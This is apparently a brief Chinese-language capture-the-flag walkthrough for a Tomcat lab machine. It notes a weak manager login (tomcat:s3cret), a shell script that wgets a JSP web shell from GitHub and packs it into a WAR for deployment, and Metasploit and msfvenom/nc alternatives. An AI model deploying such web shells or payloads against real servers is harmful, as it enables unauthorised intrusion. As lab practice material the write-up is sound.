easy box.
首先nmap开路:
找到8080端口:
Tomcat字典:
https://raw.githubusercontent…
找到弱口令tomcat:s3cret
部署war包:
办法1:
官网walkthrough上的:
#!/bin/sh
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp
mkdir wshell
cp index.jsp wshell/
cd wshell
jar -cvf ../wshell.war
部署wshell:
门路比拟深
拿到flag
办法2:
msf应用multi/http/tomcat_mgr_upload
办法3:
msfvenom生成war包
上传war包后nc: